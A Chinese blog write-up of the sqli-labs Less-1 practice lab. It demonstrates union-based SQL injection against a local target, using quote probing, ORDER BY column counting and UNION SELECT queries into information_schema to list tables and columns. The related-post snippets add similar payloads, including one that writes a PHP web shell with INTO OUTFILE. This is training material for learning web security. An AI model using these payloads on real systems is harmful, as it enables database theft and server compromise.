sqli-labs less-1

原创 已于 2022-10-09 14:46:29 修改
· 879 阅读 · 1 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

于 2022-10-09 11:32:16 首次发布

首先正常访问:

输出名字和password,加上单引号(注意要是英文的):http://localhost:8085/sqli-labs/Less-1?id=1'

 看出可能存在注入点,之后利用id = 1 and 1=2 发现依旧报错,说明这个可能是字符型的注入点,所以利用字符闭合方式进行测试:http://localhost:8085/sqli-labs/Less-1?id=1' and 1=2 order by 3 %23,注意%23是#的编码之后的格式,就是最后加了一个注释符,把后面的单引号给注释掉。

具体执行的sql语句如下:

SELECT * FROM users WHERE id='1' and 1=2 order by 3 #' LIMIT 0,1

 

现在可以确定一定存在sql注入了,就是用以下一整套流程进行漏洞利用

当order by 4 时报错了,就说明表中一共有三列

http://localhost:8085/sqli-labs/Less-1/?id=1' and 1=2 order by 4 %23

 利用联合查询,可以看出显示出内容的为2和3,

http://localhost:8085/sqli-labs/Less-1/?id=1' and 1=2 union select 1,2,3 %23

利用version()函数可以看到数据库版本:

 之后换成user()函数,可以看出当前数据库用户的角色。利用database()函数可以看到数据库名。

 之后可以从information_schema中的tables中查出具体的表有哪几个:(数据库版本5.0以上)

http://localhost:8085/sqli-labs/Less-1/?id=1' and 1=2 union select 1,(SELECT  table_name FROM information_schema .`TABLES` WHERE TABLE_SCHEMA = 'security' LIMIT 0,1),3 %23

 

 

 之后可以利用通过查TABLE_NAME查询到数据库的列名

http://localhost:8085/sqli-labs/Less-1/?id=1' and 1=2 union select 1,(SELECT COLUMN_name FROM information_schema.`COLUMNS` WHERE TABLE_SCHEMA = 'security' and TABLE_NAME = 'users' LIMIT 0,1),3 %23

 在之后,我们知道了数据库名、表名、列名,我们就能查询所有我们想查询的东西了,这套流程主要时为了记录下,知道sql注入点之后改怎么进行下一步操作。在之后学其他类型的注入点时我觉得时大同小异的,就不会做这么详细的记录了。

另外这个information_schema这个数据库只有数据库版本为5.0以上的才会有。

sqli-labs靶场less-1
wanggonghanfei的博客
09-29 354
在url后面写?id=1,有回显,输入?id=2,也有回显,输入?id=0,回显判断有注入加单引号:?id=1’报错,从 ’ ‘1’ ’ LIMIT 0,1’ 可以得知,多一个单引号,怀疑为数字型注入因为单引号需要闭合,同时原先查询语句的单引号需要注释掉,构造语句第一个单引号闭合sql语句的查询,–注释掉原先语句的的单引号,+在表示空格,回显:构造:?id=1’ and 1=2 --+,回显:确定为数字型注入。
SQL注入——sqli-labsLess-1
E-Malon的博客
05-29 434
一边查看源码,一边多方学习别人的 WriteUp,在此过程中补充基础知识,最终落到实验操作。慢慢来,比较快。欢迎大咖指导,欢迎各位网友交流经验。
sqli-labs(less-1)
墨鱼菜鸡
09-10 546
目录 less-1(union联合注入) 1.根据注入位置数据类型将sql注入分类(以localhost/sqli-labs/less-1为例子) 2.利用order判断字段数 3.利用union select 联合查询,将id值设置成不成立,即可探测到可利用的字段数 4.利用函数database(),user(),version()可以得到...
SQLI-Lab】-Less1
xinyue9966的博客
01-20 275
SQLI-Less1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)前言一、GET单引号字符型注入二、步骤总结 前言 一、GET单引号字符型注入 执行数据库查询,并在回显点展示。 用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。 二、步骤 http://192.168.135.149/sqli/Less-1/?id=1' and 1=1 -
Sqli-Labsless-1
ISNS的博客
02-03 1854
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 1.进入less-1的题目以后,我们可以看到这道题的提示“请输入ID作为带数值的参数”: 2.我们根据题目提示,尝试在URL中加上“?id=1”、“?id=2”,可以看到看到从数据库中查询到的用于登录login的用户名和密码: 我们要找的是网站后台管理员的用户名和密码,目的是拿到网站的权限,从...
sqli-labsless1
weixin_44791273的博客
09-10 276
题目提示输入id作为参数数值 浏览器通常使用 ? 来表示GET方法传递参数,而使用POST传递参数是不会显示到URL中的。 首先尝试传递 id=0 传递id=1试一下 发现查询成功,证明1是存在的 下面接着以0为例子 加上 ‘ 来试试 %27 是指 ’ 的编码 发现页面回显且报错 报错信息的最后面的内容:use near ’‘0’‘ LIMIT 0,1’ at line 1 ,仔细观察,我们都知道php的语句如果有 ’ 的话,肯定要有另一个 ‘ 来进行闭合,不然就是不完整的语句。那我们不妨.
sqli-labs less 1(菜鸟,刚学手工注入写的笔记)
qq_60829702的博客
09-17 1371
这也是我刚开始学手工注入,笔记写的还不够全面,里面少了一些注释,知识点还不全面,但我认为写的太全面对于像我一样刚接触的菜鸟不太好,因为写的太详细就会让自己产生一种错觉,认为自己已经懂了,就直接跳过这些东西,这种习惯不太好。还是要自己去查资料,去看一些官方的解释文档。下面这个博主的视频讲的也很好非常适合入门,大家如果不懂可以看这个大佬的视频。
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs实验指导手册
11-17
1. **字符型联合注入**(如less-1): - **注入点检测**:通过修改查询参数(如?id=1' and 1=1),观察页面响应变化来判断是否存在注入。 - **闭合方式判断**:通过输入特殊字符(如\)来测试闭合方式,确认是单...
Sqli-labs Less-1 报错注入
04-14 503
Sqli-labs Less-1 报错注入 1、首先打开less1后是一个页面,提示输入id作为参数。输入id=1试一下。 然后会出现,name 和 password,添加一个单引号 ' 测试一下注入点。 输入单引号发现,会直接将报错结果显示在页面中这里就可以尝试报错注入,将用户、数据库名称都爆破出来。 这里我们使用updatexml函数获取user()值。下图可以看到报错注入确实有效,我们看到用户为root,接下来爆数据库的名字。 0x7e是 '~' 的ASCII编码。 /sq.
sqli-labs通关全攻略
网安小白
07-22 715
第七步 查看users表中username,password的数据。这里存放着运行出来的数据,以表格的方式呈现。第六步 查看user表中列。根据显示,应该有四个字段。第三步 查看回显位置。
Sqli-Labs做题笔记:Less-21 - Less-26a
Forever_Han13的博客
01-23 607
绕过: 过滤关键字 穿插关键字绕过: select selselctect or oorr union ununionion 大小写转换: select SelECt or Or union uNIon 十六进制转换: select selec\x74 or o\x72 union unio\x6e 双重URL编码: select %25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34
sqli-labs Less1-4闯关
m0_60829468的博客
10-19 299
目录 SQL注入思路 一、Less-1 1.打开靶场第一关我们发现提示,说的是有一个参数:ID。 2.按照提示输入ID返现新的界面,提示ID的值为数字。 3. 将ID的设置为1查看页面返回结果(id需要变为小写)。 4.更换不同的id值发现,不同的值页面会出现不同的用户名和密码;说明这个靶场id作为一个参数,对数据库进行了查询,数据库在进行查询时会对参数进行特殊标明"参数"('参数'),我们可以多加一个引号看看会不会造成意想不到的事。 5. 发现出现数据库报错,证明输入的数据库查询语言有问题。
sqli-labs Less-1
weixin_33851177的博客
03-19 90
1.首先来到less-1 1.png 2.png 2.请以数字值作为参数输入id。 url后面输入?id=1 3.png 大家可能此时与我不同的是 your sql statement is SELECT * FROM users WHERE id='1' LIMI...
sqli-lab靶场学习(一)——Less1-4(语句闭合,联合注入)
sadoshi的专栏
09-03 1049
最近一段时间想切入安全领域,因为本身有做数据库运维工作,就打算从sql注入方向切入。而sql注入除了学习日常书本上的概念外,需要有个实践的环境,刚好看到sqli-lab这个靶场,就打算先用这个来学习。
sqli-lab Less1-10通关
最新发布
weixin_65725423的博客
09-23 1267
页面中“Please input the ID as parameter with numeric value”意思是请以数字值作为参数输入用户标示符。首先判断这是数字注入还是字符注入。经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询。然后在id后面加个',就会报错,可能是字符型注入输入--+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入然后用order by 来判断有多少列数据,order by 3,发现是页面正常。
记一次sql注入过程 — sqli-labs(Less-1)
星虐
03-14 558
1.进入环境就是这样的界面 2.尝试将URL中 id=1 改为 id=1’ and 1='1 页面正常 3.尝试将URL中 id=1 改为 id=1‘ and 1='2 页面显示不正常 (由步骤2和步骤3可确定为单引号注入) 4.使用 order by 语句进行字段查询 –+为SQL注入中URL里使用的注释符 构造 id=1’ order by 1 --+ 页面显示正常 构造 id=1’ order by 2 --+ 页面显示正常 构造 id=1’ order by 3 --+ 页面显示正常 构造
SQL注入之sqli-labsLess1~10史上最详细通关教程
qq_49502930的博客
11-14 6994
SQL注入之sqli-labs详细通关教程 首先需要准备好火狐浏览器(方便下载hackbar这个插件)还有phpstudy搭建,以及sqli-labs搭建。其次,我们需要有一定的数据库基本语句基础,通关时有必要的语句我会解释,也希望大家可以自己在网上查找学习相关语句。 下面展示一些 基本语句。 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables w
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值